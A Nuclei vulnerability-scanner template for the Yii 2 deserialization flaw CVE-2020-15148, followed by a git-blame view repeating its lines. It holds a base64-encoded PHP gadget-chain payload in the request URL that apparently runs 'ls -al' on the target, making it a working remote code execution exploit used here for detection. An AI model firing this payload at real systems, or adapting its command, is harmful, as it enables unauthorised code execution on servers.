nuclei-templates/cves/2020/CVE-2020-15148.yaml

id: CVE-2020-15148

info:
  name: Yii 2 (yiisoft/yii2) RCE
  author: pikpikcu
  severity: high
  reference: |
      - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
      - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
  tags: cve,cve2020,rce,yii

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "total"
          - "internal server error"
        condition: and

      - type: status
        status:
          - 500
Create CVE-2020-15148.yaml 2021-03-29 20:47:04 +00:00			`id: CVE-2020-15148`

			`info:`
			`name: Yii 2 (yiisoft/yii2) RCE`
Update CVE-2020-15148.yaml 2021-03-31 10:05:43 +00:00			`author: pikpikcu`
Create CVE-2020-15148.yaml 2021-03-29 20:47:04 +00:00			`severity: high`
improved matcher 2021-04-01 09:01:34 +00:00			`reference: \|`
			`- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943`
			`- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md`
Create CVE-2020-15148.yaml 2021-03-29 20:47:04 +00:00			`tags: cve,cve2020,rce,yii`

			`requests:`
			`- method: GET`
			`path:`
improved matcher 2021-04-01 09:01:34 +00:00			`- "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="`
Create CVE-2020-15148.yaml 2021-03-29 20:47:04 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
improved matcher 2021-04-01 09:01:34 +00:00			`- "total"`
			`- "internal server error"`
Create CVE-2020-15148.yaml 2021-03-29 20:47:04 +00:00			`condition: and`

			`- type: status`
			`status:`
improved matcher 2021-04-01 09:01:34 +00:00			`- 500`